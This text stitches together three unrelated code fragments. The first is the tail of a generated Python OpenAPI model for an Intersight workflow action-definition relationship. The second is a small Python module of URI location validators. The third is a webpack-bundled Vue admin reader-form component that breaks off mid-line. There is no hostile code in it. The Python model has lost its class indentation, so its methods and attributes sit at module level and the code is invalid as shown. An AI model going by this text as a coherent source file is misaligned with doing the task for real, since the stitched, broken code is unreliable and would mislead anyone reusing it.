'VIRTUALIZATION.VMWAREVIRTUALSWITCH': "virtualization.VmwareVirtualSwitch",
'VMEDIA.POLICY': "vmedia.Policy",
'VMRC.CONSOLE': "vmrc.Console",
'VNC.CONSOLE': "vnc.Console",
'VNIC.ETHADAPTERPOLICY': "vnic.EthAdapterPolicy",
'VNIC.ETHIF': "vnic.EthIf",
'VNIC.ETHNETWORKPOLICY': "vnic.EthNetworkPolicy",
'VNIC.ETHQOSPOLICY': "vnic.EthQosPolicy",
'VNIC.FCADAPTERPOLICY': "vnic.FcAdapterPolicy",
'VNIC.FCIF': "vnic.FcIf",
'VNIC.FCNETWORKPOLICY': "vnic.FcNetworkPolicy",
'VNIC.FCQOSPOLICY': "vnic.FcQosPolicy",
'VNIC.ISCSIADAPTERPOLICY': "vnic.IscsiAdapterPolicy",
'VNIC.ISCSIBOOTPOLICY': "vnic.IscsiBootPolicy",
'VNIC.ISCSISTATICTARGETPOLICY': "vnic.IscsiStaticTargetPolicy",
'VNIC.LANCONNECTIVITYPOLICY': "vnic.LanConnectivityPolicy",
'VNIC.LCPSTATUS': "vnic.LcpStatus",
'VNIC.SANCONNECTIVITYPOLICY': "vnic.SanConnectivityPolicy",
'VNIC.SCPSTATUS': "vnic.ScpStatus",
'VRF.VRF': "vrf.Vrf",
'WORKFLOW.ANSIBLEBATCHEXECUTOR': "workflow.AnsibleBatchExecutor",
'WORKFLOW.BATCHAPIEXECUTOR': "workflow.BatchApiExecutor",
'WORKFLOW.BUILDTASKMETA': "workflow.BuildTaskMeta",
'WORKFLOW.BUILDTASKMETAOWNER': "workflow.BuildTaskMetaOwner",
'WORKFLOW.CATALOG': "workflow.Catalog",
'WORKFLOW.CUSTOMDATATYPEDEFINITION': "workflow.CustomDataTypeDefinition",
'WORKFLOW.ERRORRESPONSEHANDLER': "workflow.ErrorResponseHandler",
'WORKFLOW.PENDINGDYNAMICWORKFLOWINFO': "workflow.PendingDynamicWorkflowInfo",
'WORKFLOW.ROLLBACKWORKFLOW': "workflow.RollbackWorkflow",
'WORKFLOW.SOLUTIONACTIONDEFINITION': "workflow.SolutionActionDefinition",
'WORKFLOW.SOLUTIONACTIONINSTANCE': "workflow.SolutionActionInstance",
'WORKFLOW.SOLUTIONDEFINITION': "workflow.SolutionDefinition",
'WORKFLOW.SOLUTIONINSTANCE': "workflow.SolutionInstance",
'WORKFLOW.SOLUTIONOUTPUT': "workflow.SolutionOutput",
'WORKFLOW.SSHBATCHEXECUTOR': "workflow.SshBatchExecutor",
'WORKFLOW.TASKDEBUGLOG': "workflow.TaskDebugLog",
'WORKFLOW.TASKDEFINITION': "workflow.TaskDefinition",
'WORKFLOW.TASKINFO': "workflow.TaskInfo",
'WORKFLOW.TASKMETADATA': "workflow.TaskMetadata",
'WORKFLOW.TASKNOTIFICATION': "workflow.TaskNotification",
'WORKFLOW.TEMPLATEEVALUATION': "workflow.TemplateEvaluation",
'WORKFLOW.TEMPLATEFUNCTIONMETA': "workflow.TemplateFunctionMeta",
'WORKFLOW.WORKFLOWDEFINITION': "workflow.WorkflowDefinition",
'WORKFLOW.WORKFLOWINFO': "workflow.WorkflowInfo",
'WORKFLOW.WORKFLOWMETA': "workflow.WorkflowMeta",
'WORKFLOW.WORKFLOWMETADATA': "workflow.WorkflowMetadata",
'WORKFLOW.WORKFLOWNOTIFICATION': "workflow.WorkflowNotification",
},
}
# Server-side validation constraints for writable properties, keyed by
# attribute path tuple. Enforced by the generated model machinery when a
# value is assigned to the corresponding attribute.
validations = {
    ('label',): {
        'regex': {
            # One leading alphanumeric character followed by 1-92 characters
            # drawn from whitespace, alphanumerics, '_', '.', ':' or '-'.
            'pattern': r'^[a-zA-Z0-9]+[\sa-zA-Z0-9_.:-]{1,92}$',  # noqa: E501
        },
    },
    ('name',): {
        'regex': {
            # 1-64 characters: alphanumerics, '_', '.', ':' or '-'; no spaces.
            'pattern': r'^[a-zA-Z0-9_.:-]{1,64}$',  # noqa: E501
        },
    },
    ('periodicity',): {
        # Seconds; 604800 == 7 days.
        'inclusive_maximum': 604800,
        'inclusive_minimum': 0,
    },
}
@cached_property
def additional_properties_type():
    """
    This must be a method because a model may have properties that are
    of type self, this must run after the class is loaded

    Returns the tuple of types accepted for properties not declared in
    ``openapi_types`` (i.e. any JSON-representable value).
    """
    # Resolve circular model imports lazily, only once this is first accessed.
    lazy_import()
    return (bool, date, datetime, dict, float, int, list, str, none_type,)  # noqa: E501

# This model itself may not be serialized as JSON null.
_nullable = False
@cached_property
def openapi_types():
    """
    This must be a method because a model may have properties that are
    of type self, this must run after the class is loaded

    Returns
        openapi_types (dict): The key is attribute name
            and the value is attribute type.
    """
    # Resolve circular model imports lazily, only once this is first accessed.
    lazy_import()
    # Tuples are the accepted types for each attribute; ``none_type`` in a
    # tuple marks the attribute as nullable in the API payload.
    return {
        'class_id': (str,),  # noqa: E501
        'moid': (str,),  # noqa: E501
        'selector': (str,),  # noqa: E501
        'link': (str,),  # noqa: E501
        'account_moid': (str,),  # noqa: E501
        'create_time': (datetime,),  # noqa: E501
        'domain_group_moid': (str,),  # noqa: E501
        'mod_time': (datetime,),  # noqa: E501
        'owners': ([str], none_type,),  # noqa: E501
        'shared_scope': (str,),  # noqa: E501
        'tags': ([MoTag], none_type,),  # noqa: E501
        'version_context': (MoVersionContext,),  # noqa: E501
        'ancestors': ([MoBaseMoRelationship], none_type,),  # noqa: E501
        'parent': (MoBaseMoRelationship,),  # noqa: E501
        'permission_resources': ([MoBaseMoRelationship], none_type,),  # noqa: E501
        'display_names': (DisplayNames,),  # noqa: E501
        'action_type': (str,),  # noqa: E501
        'allowed_instance_states': ([str], none_type,),  # noqa: E501
        'core_workflows': ([WorkflowActionWorkflowDefinition], none_type,),  # noqa: E501
        'description': (str,),  # noqa: E501
        'input_definition': ([WorkflowBaseDataType], none_type,),  # noqa: E501
        'label': (str,),  # noqa: E501
        'name': (str,),  # noqa: E501
        'output_parameters': (bool, date, datetime, dict, float, int, list, str, none_type,),  # noqa: E501
        'periodicity': (int,),  # noqa: E501
        'post_core_workflows': ([WorkflowActionWorkflowDefinition], none_type,),  # noqa: E501
        'pre_core_workflows': ([WorkflowActionWorkflowDefinition], none_type,),  # noqa: E501
        'stop_workflows': ([WorkflowActionWorkflowDefinition], none_type,),  # noqa: E501
        'validation_information': (WorkflowValidationInformation,),  # noqa: E501
        'validation_workflows': ([WorkflowActionWorkflowDefinition], none_type,),  # noqa: E501
        'solution_definition': (WorkflowSolutionDefinitionRelationship,),  # noqa: E501
        'workflow_definition': (WorkflowWorkflowDefinitionRelationship,),  # noqa: E501
        'object_type': (str,),  # noqa: E501
    }
@cached_property
def discriminator():
    """Discriminator mapping used to pick the concrete model class.

    Returns a dict keyed by the discriminator property name
    (``class_id``) whose value maps each ClassId string to its model
    class, or ``None`` when no mapping exists.
    """
    # Resolve circular model imports lazily, only once this is first accessed.
    lazy_import()
    mapping = {
        'mo.MoRef': MoMoRef,
        'workflow.SolutionActionDefinition': WorkflowSolutionActionDefinition,
    }
    return {'class_id': mapping} if mapping else None
# Maps pythonic (snake_case) attribute names to the serialized (PascalCase)
# JSON property names used on the wire.
attribute_map = {
    'class_id': 'ClassId',  # noqa: E501
    'moid': 'Moid',  # noqa: E501
    'selector': 'Selector',  # noqa: E501
    # NOTE(review): 'link' is intentionally lowercase in the generated spec,
    # unlike every other key — presumably a HAL-style link field; confirm
    # against the API schema before "fixing".
    'link': 'link',  # noqa: E501
    'account_moid': 'AccountMoid',  # noqa: E501
    'create_time': 'CreateTime',  # noqa: E501
    'domain_group_moid': 'DomainGroupMoid',  # noqa: E501
    'mod_time': 'ModTime',  # noqa: E501
    'owners': 'Owners',  # noqa: E501
    'shared_scope': 'SharedScope',  # noqa: E501
    'tags': 'Tags',  # noqa: E501
    'version_context': 'VersionContext',  # noqa: E501
    'ancestors': 'Ancestors',  # noqa: E501
    'parent': 'Parent',  # noqa: E501
    'permission_resources': 'PermissionResources',  # noqa: E501
    'display_names': 'DisplayNames',  # noqa: E501
    'action_type': 'ActionType',  # noqa: E501
    'allowed_instance_states': 'AllowedInstanceStates',  # noqa: E501
    'core_workflows': 'CoreWorkflows',  # noqa: E501
    'description': 'Description',  # noqa: E501
    'input_definition': 'InputDefinition',  # noqa: E501
    'label': 'Label',  # noqa: E501
    'name': 'Name',  # noqa: E501
    'output_parameters': 'OutputParameters',  # noqa: E501
    'periodicity': 'Periodicity',  # noqa: E501
    'post_core_workflows': 'PostCoreWorkflows',  # noqa: E501
    'pre_core_workflows': 'PreCoreWorkflows',  # noqa: E501
    'stop_workflows': 'StopWorkflows',  # noqa: E501
    'validation_information': 'ValidationInformation',  # noqa: E501
    'validation_workflows': 'ValidationWorkflows',  # noqa: E501
    'solution_definition': 'SolutionDefinition',  # noqa: E501
    'workflow_definition': 'WorkflowDefinition',  # noqa: E501
    'object_type': 'ObjectType',  # noqa: E501
}
# Internal bookkeeping attribute names that are always stored directly on the
# instance (bypassing the model's managed-attribute handling).
# Idiom fix: use a set literal instead of set([...]) — same contents, no
# intermediate list.
required_properties = {
    '_data_store',
    '_check_type',
    '_spec_property_naming',
    '_path_to_item',
    '_configuration',
    '_visited_composed_classes',
    '_composed_instances',
    '_var_name_to_model_instances',
    '_additional_properties_model_instances',
}
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):  # noqa: E501
    """WorkflowSolutionActionDefinitionRelationship - a model defined in OpenAPI

    Args:

    Keyword Args:
        class_id (str): The fully-qualified name of the instantiated, concrete type. This property is used as a discriminator to identify the type of the payload when marshaling and unmarshaling data.. defaults to "mo.MoRef", must be one of ["mo.MoRef", ]  # noqa: E501
        _check_type (bool): if True, values for parameters in openapi_types
            will be type checked and a TypeError will be
            raised if the wrong type is input.
            Defaults to True
        _path_to_item (tuple/list): This is a list of keys or values to
            drill down to the model in received_data
            when deserializing a response
        _spec_property_naming (bool): True if the variable names in the input data
            are serialized names, as specified in the OpenAPI document.
            False if the variable names in the input data
            are pythonic names, e.g. snake case (default)
        _configuration (Configuration): the instance to use when
            deserializing a file_type parameter.
            If passed, type conversion is attempted
            If omitted no type conversion is done.
        _visited_composed_classes (tuple): This stores a tuple of
            classes that we have traveled through so that
            if we see that class again we will not use its
            discriminator again.
            When traveling through a discriminator, the
            composed schema that is
            is traveled through is added to this set.
            For example if Animal has a discriminator
            petType and we pass in "Dog", and the class Dog
            allOf includes Animal, we move through Animal
            once using the discriminator, and pick Dog.
            Then in Dog, we will make an instance of the
            Animal class but this time we won't travel
            through its discriminator because we passed in
            _visited_composed_classes = (Animal,)
        moid (str): The Moid of the referenced REST resource.. [optional]  # noqa: E501
        selector (str): An OData $filter expression which describes the REST resource to be referenced. This field may be set instead of 'moid' by clients. 1. If 'moid' is set this field is ignored. 1. If 'selector' is set and 'moid' is empty/absent from the request, Intersight determines the Moid of the resource matching the filter expression and populates it in the MoRef that is part of the object instance being inserted/updated to fulfill the REST request. An error is returned if the filter matches zero or more than one REST resource. An example filter string is: Serial eq '3AA8B7T11'.. [optional]  # noqa: E501
        link (str): A URL to an instance of the 'mo.MoRef' class.. [optional]  # noqa: E501
        account_moid (str): The Account ID for this managed object.. [optional]  # noqa: E501
        create_time (datetime): The time when this managed object was created.. [optional]  # noqa: E501
        domain_group_moid (str): The DomainGroup ID for this managed object.. [optional]  # noqa: E501
        mod_time (datetime): The time when this managed object was last modified.. [optional]  # noqa: E501
        owners ([str], none_type): [optional]  # noqa: E501
        shared_scope (str): Intersight provides pre-built workflows, tasks and policies to end users through global catalogs. Objects that are made available through global catalogs are said to have a 'shared' ownership. Shared objects are either made globally available to all end users or restricted to end users based on their license entitlement. Users can use this property to differentiate the scope (global or a specific license tier) to which a shared MO belongs.. [optional]  # noqa: E501
        tags ([MoTag], none_type): [optional]  # noqa: E501
        version_context (MoVersionContext): [optional]  # noqa: E501
        ancestors ([MoBaseMoRelationship], none_type): An array of relationships to moBaseMo resources.. [optional]  # noqa: E501
        parent (MoBaseMoRelationship): [optional]  # noqa: E501
        permission_resources ([MoBaseMoRelationship], none_type): An array of relationships to moBaseMo resources.. [optional]  # noqa: E501
        display_names (DisplayNames): [optional]  # noqa: E501
        action_type (str): Type of actionDefinition which decides on how to trigger the action. * `External` - External actions definition can be triggered by enduser to perform actions on the solution. Once action is completed successfully (eg. create/deploy), user cannot re-trigger that action again. * `Internal` - Internal action definition is used to trigger periodic actions on the solution instance. * `Repetitive` - Repetitive action definition is an external action that can be triggered by enduser to perform repetitive actions (eg. Edit/Update/Perform health check) on the created solution.. [optional] if omitted the server will use the default value of "External"  # noqa: E501
        allowed_instance_states ([str], none_type): [optional]  # noqa: E501
        core_workflows ([WorkflowActionWorkflowDefinition], none_type): [optional]  # noqa: E501
        description (str): The description for this action which provides information on what are the pre-requisites to use this action on the solution and what features are supported by this action.. [optional]  # noqa: E501
        input_definition ([WorkflowBaseDataType], none_type): [optional]  # noqa: E501
        label (str): A user friendly short name to identify the action. Name can only contain letters (a-z, A-Z), numbers (0-9), hyphen (-), period (.), colon (:), space ( ) or an underscore (_).. [optional]  # noqa: E501
        name (str): The name for this action definition. Name can only contain letters (a-z, A-Z), numbers (0-9), hyphen (-), period (.), colon (:) or an underscore (_). Name of the action must be unique within a solution definition.. [optional]  # noqa: E501
        output_parameters (bool, date, datetime, dict, float, int, list, str, none_type): The output mappings from workflows in the action definition to the solution output definition. Any output from core or post-core workflow can be mapped to solution output definition. The output can be referred using the name of the workflow definition and the output name in the following format '${<ActionWorkflowDefinition.Name>.output.<outputName>'.. [optional]  # noqa: E501
        periodicity (int): Value in seconds to specify the periodicity of the workflows. A zero value indicate the workflow will not execute periodically. A non-zero value indicate, the workflow will be executed periodically with this periodicity.. [optional]  # noqa: E501
        post_core_workflows ([WorkflowActionWorkflowDefinition], none_type): [optional]  # noqa: E501
        pre_core_workflows ([WorkflowActionWorkflowDefinition], none_type): [optional]  # noqa: E501
        stop_workflows ([WorkflowActionWorkflowDefinition], none_type): [optional]  # noqa: E501
        validation_information (WorkflowValidationInformation): [optional]  # noqa: E501
        validation_workflows ([WorkflowActionWorkflowDefinition], none_type): [optional]  # noqa: E501
        solution_definition (WorkflowSolutionDefinitionRelationship): [optional]  # noqa: E501
        workflow_definition (WorkflowWorkflowDefinitionRelationship): [optional]  # noqa: E501
        object_type (str): The fully-qualified name of the remote type referred by this relationship.. [optional]  # noqa: E501
    """
    # class_id is read with get() (not pop()) so it remains in kwargs and
    # is later validated/assigned like any other model property.
    class_id = kwargs.get('class_id', "mo.MoRef")
    # Internal control arguments are pop()ed so they are not treated as
    # model properties during composed-schema validation below.
    _check_type = kwargs.pop('_check_type', True)
    _spec_property_naming = kwargs.pop('_spec_property_naming', False)
    _path_to_item = kwargs.pop('_path_to_item', ())
    _configuration = kwargs.pop('_configuration', None)
    _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
    # All model properties must be passed by keyword; positional arguments
    # are rejected outright.
    if args:
        raise ApiTypeError(
            "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                args,
                self.__class__.__name__,
            ),
            path_to_item=_path_to_item,
            valid_classes=(self.__class__,),
        )
    self._data_store = {}
    self._check_type = _check_type
    self._spec_property_naming = _spec_property_naming
    self._path_to_item = _path_to_item
    self._configuration = _configuration
    # Record this class so a composed-schema traversal will not apply its
    # discriminator again (see the _visited_composed_classes note above).
    self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
    # Arguments forwarded unchanged to every composed-schema instance.
    constant_args = {
        '_check_type': _check_type,
        '_path_to_item': _path_to_item,
        '_spec_property_naming': _spec_property_naming,
        '_configuration': _configuration,
        '_visited_composed_classes': self._visited_composed_classes,
    }
    required_args = {
        'class_id': class_id,
    }
    model_args = {}
    model_args.update(required_args)
    model_args.update(kwargs)
    # Validate model_args against the composed (oneOf) schemas and build
    # one model instance per matching schema.
    composed_info = validate_get_composed_info(
        constant_args, model_args, self)
    self._composed_instances = composed_info[0]
    self._var_name_to_model_instances = composed_info[1]
    self._additional_properties_model_instances = composed_info[2]
    unused_args = composed_info[3]

    for var_name, var_value in required_args.items():
        setattr(self, var_name, var_value)
    for var_name, var_value in kwargs.items():
        # Drop keys no composed schema consumed when the configuration
        # asks for unknown keys to be discarded and no additionalProperties
        # model can absorb them; otherwise set them on this instance.
        if var_name in unused_args and \
                self._configuration is not None and \
                self._configuration.discard_unknown_keys and \
                not self._additional_properties_model_instances:
            # discard variable.
            continue
        setattr(self, var_name, var_value)
@cached_property
def _composed_schemas():
    """Return the composed-schema class lists (anyOf/allOf/oneOf).

    This relationship is a oneOf over MoMoRef, the concrete
    WorkflowSolutionActionDefinition model, and none_type.
    """
    # we need this here to make our import statements work
    # we must store _composed_schemas in here so the code is only run
    # when we invoke this method. If we kept this at the class
    # level we would get an error because the class level
    # code would be run when this module is imported, and these composed
    # classes don't exist yet because their module has not finished
    # loading
    lazy_import()
    return {
        'anyOf': [
        ],
        'allOf': [
        ],
        'oneOf': [
            MoMoRef,
            WorkflowSolutionActionDefinition,
            none_type,
        ],
    }
|
from abc import ABCMeta, abstractmethod
import typing as t
__all__ = []
class FlexibleLocation(metaclass=ABCMeta):
    """Abstract base class of flexible locations.

    A location is one piece of a URI path; a full path is formed by
    joining locations with the separator `/`. Each location is either a
    plain `str` (a "static" location) or an instance of a subclass of
    this class (a "flexible" location). A flexible location carries a
    logical rule describing which strings are acceptable; subclasses
    express that rule by implementing the `is_valid` method, which
    reports whether a given string satisfies it.
    """

    @abstractmethod
    def is_valid(self, loc: str) -> bool:
        pass

    def __str__(self) -> str:
        # Display a flexible location by its concrete class name.
        return type(self).__name__
# One piece of a URI path: a static string or a flexible location.
Location_t = t.Union[str, FlexibleLocation]
# Alias for the static (plain string) form of a location.
StaticLocation_t = str
# A full URI pattern: a tuple of locations, joined with '/' to form a path.
Uri_t = t.Tuple[Location_t, ...]
def is_flexible_uri(uri: Uri_t) -> bool:
    """Judge if specified `uri` has one or more flexible location.

    Args:
        uri: URI pattern to be judged.

    Returns:
        True if specified `uri` has one or more flexible location,
        False otherwise.
    """
    return any(isinstance(loc, FlexibleLocation) for loc in uri)
def is_duplicated_uri(uri_1: Uri_t, uri_2: Uri_t) -> bool:
    """Judge if a couple of specified URI patterns has same pattern.

    Two patterns collide when they have the same length and, at every
    position, either side is a flexible location (which can match
    anything) or the two static locations are equal.

    Args:
        uri_1: URI pattern to be judged
        uri_2: URI pattern to be judged

    Returns:
        True if two URIs has same pattern, False otherwise.
    """
    if len(uri_1) != len(uri_2):
        return False

    for piece_1, piece_2 in zip(uri_1, uri_2):
        # A flexible location on either side matches any counterpart.
        if isinstance(piece_1, FlexibleLocation):
            continue
        if isinstance(piece_2, FlexibleLocation):
            continue
        if piece_1 != piece_2:
            return False
    return True
class AsciiDigitLocation(FlexibleLocation):
    """Flexible location matching a fixed-width run of ASCII digits.
    """

    def __init__(self, digits: int) -> None:
        """
        Args:
            digits: Number of digits which the location accepts.

        Raises:
            ValueError: Raised if `digits` is 0 or less.
        """
        if digits < 1:
            raise ValueError("'digits' must be bigger than 0.")

        self._digits = digits

    def is_valid(self, loc: str) -> bool:
        """Judge if specified `loc` is valid location or not.

        Args:
            loc: Location to be judged.

        Returns:
            True if specified location is valid, False otherwise.
        """
        # Both checks are required: str.isdigit alone also accepts
        # non-ASCII digit characters.
        if not (loc.isascii() and loc.isdigit()):
            return False
        return len(loc) == self._digits
class AnyStringLocation(FlexibleLocation):
    """Flexible location representing string with no rules.
    """

    def __init__(self, max: t.Optional[int] = None) -> None:
        """
        Note:
            If the argument `max` is `None`, then any length of string
            will be accepted.

        Args:
            max: Max length of string of location.

        Raises:
            ValueError: Raised if `max` is 0 or less.
        """
        # BUG FIX: the previous check was `if max and max < 1`, which treats
        # max == 0 as falsy and skips the error, yielding a validator that
        # silently rejects every string. Compare against None explicitly so
        # that 0 raises ValueError as the docstring promises.
        if max is not None and max < 1:
            raise ValueError("'max' must be bigger than 0.")

        self._max = max

    def is_valid(self, loc: str) -> bool:
        """Judge if specified `loc` is valid location or not.

        Args:
            loc: Location to be judged.

        Returns:
            True if specified location is valid, False otherwise.
        """
        if self._max is None:
            return True

        # Empty strings are never valid once a max length is set.
        return 0 < len(loc) <= self._max
|
(window["webpackJsonp"] = window["webpackJsonp"] || []).push([[30],{
/***/ "./node_modules/babel-loader/lib/index.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&":
/*!******************************************************************************************************************************************************************************!*\
!*** ./node_modules/babel-loader/lib??ref--4-0!./node_modules/vue-loader/lib??vue-loader-options!./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js& ***!
\******************************************************************************************************************************************************************************/
/*! exports provided: default */
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
eval("__webpack_require__.r(__webpack_exports__);\n/* harmony import */ var _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(/*! @babel/runtime/regenerator */ \"./node_modules/@babel/runtime/regenerator/index.js\");\n/* harmony import */ var _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default = /*#__PURE__*/__webpack_require__.n(_babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0__);\n/* harmony import */ var vform__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(/*! vform */ \"./node_modules/vform/dist/vform.common.js\");\n/* harmony import */ var vform__WEBPACK_IMPORTED_MODULE_1___default = /*#__PURE__*/__webpack_require__.n(vform__WEBPACK_IMPORTED_MODULE_1__);\n/* harmony import */ var vuex__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(/*! vuex */ \"./node_modules/vuex/dist/vuex.esm.js\");\n/* harmony import */ var _helpers__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(/*! ~/helpers */ \"./resources/js/helpers/index.js\");\n/* harmony import */ var sweetalert2__WEBPACK_IMPORTED_MODULE_4__ = __webpack_require__(/*! sweetalert2 */ \"./node_modules/sweetalert2/dist/sweetalert2.all.js\");\n/* harmony import */ var sweetalert2__WEBPACK_IMPORTED_MODULE_4___default = /*#__PURE__*/__webpack_require__.n(sweetalert2__WEBPACK_IMPORTED_MODULE_4__);\n/* harmony import */ var primevue_inputswitch__WEBPACK_IMPORTED_MODULE_5__ = __webpack_require__(/*! primevue/inputswitch */ \"./node_modules/primevue/inputswitch/index.js\");\n/* harmony import */ var primevue_inputswitch__WEBPACK_IMPORTED_MODULE_5___default = /*#__PURE__*/__webpack_require__.n(primevue_inputswitch__WEBPACK_IMPORTED_MODULE_5__);\n/* harmony import */ var vue_birth_datepicker_src_birth_datepicker__WEBPACK_IMPORTED_MODULE_6__ = __webpack_require__(/*! 
vue-birth-datepicker/src/birth-datepicker */ \"./node_modules/vue-birth-datepicker/src/birth-datepicker.vue\");\n\n\nfunction asyncGeneratorStep(gen, resolve, reject, _next, _throw, key, arg) { try { var info = gen[key](arg); var value = info.value; } catch (error) { reject(error); return; } if (info.done) { resolve(value); } else { Promise.resolve(value).then(_next, _throw); } }\n\nfunction _asyncToGenerator(fn) { return function () { var self = this, args = arguments; return new Promise(function (resolve, reject) { var gen = fn.apply(self, args); function _next(value) { asyncGeneratorStep(gen, resolve, reject, _next, _throw, \"next\", value); } function _throw(err) { asyncGeneratorStep(gen, resolve, reject, _next, _throw, \"throw\", err); } _next(undefined); }); }; }\n\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n//\n\n\n\n\n\n\n/* harmony default export */ __webpack_exports__[\"default\"] = ({\n scrollToTop: false,\n metaInfo: function metaInfo() {\n return {\n title: this.$t('settings')\n };\n },\n 
components: {\n InputSwitch: primevue_inputswitch__WEBPACK_IMPORTED_MODULE_5___default.a,\n birthDatepicker: vue_birth_datepicker_src_birth_datepicker__WEBPACK_IMPORTED_MODULE_6__[\"default\"]\n },\n data: function data() {\n return {\n isUpdating: false,\n isAdditionalUpdating: false,\n sync_banned: false,\n sync_visible: false,\n sync_approved: false,\n genders: [{\n id: 0,\n name: 'Male'\n }, {\n id: 1,\n name: 'Female'\n }, {\n id: 2,\n name: 'Other'\n }]\n };\n },\n computed: Object(vuex__WEBPACK_IMPORTED_MODULE_2__[\"mapGetters\"])({\n user: 'auth/user',\n readerForm: 'admin-reader/readerForm',\n additionalForm: 'admin-reader/additionalForm',\n is_banned: 'admin-reader/is_banned',\n visible: 'admin-reader/visible'\n }),\n beforeMount: function beforeMount() {\n var _this = this;\n\n var id = this.$route.params.id;\n this.$store.dispatch(\"admin-reader/viewReader\", id).then(function () {\n console.log(_this.readerForm.is_banned);\n _this.sync_banned = _this.readerForm.is_banned === 1 ? true : false;\n console.log(_this.sync_banned);\n _this.sync_visible = _this.readerForm.visible === 1 ? true : false;\n _this.sync_approved = _this.readerForm.is_approved === \"APPROVED\" ? 
true : false;\n });\n this.$store.dispatch(\"admin-reader/viewAdditional\", id).then(function () {\n console.log(_this.additionalForm);\n });\n },\n methods: {\n update: function update() {\n var _this2 = this;\n\n return _asyncToGenerator( /*#__PURE__*/_babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default.a.mark(function _callee() {\n return _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default.a.wrap(function _callee$(_context) {\n while (1) {\n switch (_context.prev = _context.next) {\n case 0:\n sweetalert2__WEBPACK_IMPORTED_MODULE_4___default.a.fire({\n title: 'Are you sure?',\n text: \"You are about to update this reader\",\n icon: 'warning',\n showCancelButton: true,\n confirmButtonColor: '#3085d6',\n cancelButtonColor: '#d33',\n confirmButtonText: 'Confirm'\n }).then(function (result) {\n console.log(result.value);\n\n if (result.value) {\n console.log(_this2.sync_banned);\n if (_this2.sync_banned == 0 || _this2.sync_banned == false) _this2.readerForm.is_banned = 0;else if (_this2.sync_banned == 1 || _this2.sync_banned == true) _this2.readerForm.is_banned = 1;\n console.log(_this2.visible);\n if (_this2.sync_visible == 1 || _this2.sync_visible == true) _this2.readerForm.visible = 1;else if (_this2.sync_visible == 0 || _this2.sync_visible == false) _this2.visible = 0;\n if (_this2.sync_approved == 0 || _this2.sync_approved == false) _this2.readerForm.is_approved = \"REJECTED\";else if (_this2.sync_approved == 1 || _this2.sync_approved == true) _this2.readerForm.is_approved = \"APPROVED\";\n\n _this2.$store.dispatch('admin-reader/editReader', _this2.readerForm).then(function (_ref) {\n var success = _ref.success,\n message = _ref.message;\n\n if (success) {\n Object(_helpers__WEBPACK_IMPORTED_MODULE_3__[\"swalSuccess\"])(\"Reader Updated\").then(function () {\n _this2.isUpdating = false;\n });\n }\n });\n }\n });\n\n case 1:\n case \"end\":\n return _context.stop();\n }\n }\n }, _callee);\n }))();\n },\n cancelUpdate: function 
cancelUpdate() {\n var _this3 = this;\n\n this.readerForm.keys().forEach(function (key) {\n _this3.readerForm[key] = _this3.user[key];\n });\n this.isUpdating = false;\n },\n removeAccount: function removeAccount() {\n var _this4 = this;\n\n sweetalert2__WEBPACK_IMPORTED_MODULE_4___default.a.fire({\n title: 'Are you sure?',\n text: \"You won't be able to revert this!\",\n icon: 'warning',\n showCancelButton: true,\n confirmButtonColor: '#3085d6',\n cancelButtonColor: '#d33',\n confirmButtonText: 'Yes, delete it!'\n }).then(function (result) {\n console.log(result);\n\n if (result.value) {\n _this4.$store.dispatch('admin-reader/removeReader', _this4.readerForm.id).then(function (_ref2) {\n var success = _ref2.success,\n message = _ref2.message;\n\n if (success) {\n Object(_helpers__WEBPACK_IMPORTED_MODULE_3__[\"swalSuccess\"])(\"Reader removed!\").then(function () {\n _this4.$router.push({\n name: 'admin.readers'\n });\n });\n }\n });\n }\n });\n },\n goBack: function goBack() {\n this.$router.back();\n }\n }\n});//# sourceURL=[module]\n//# 
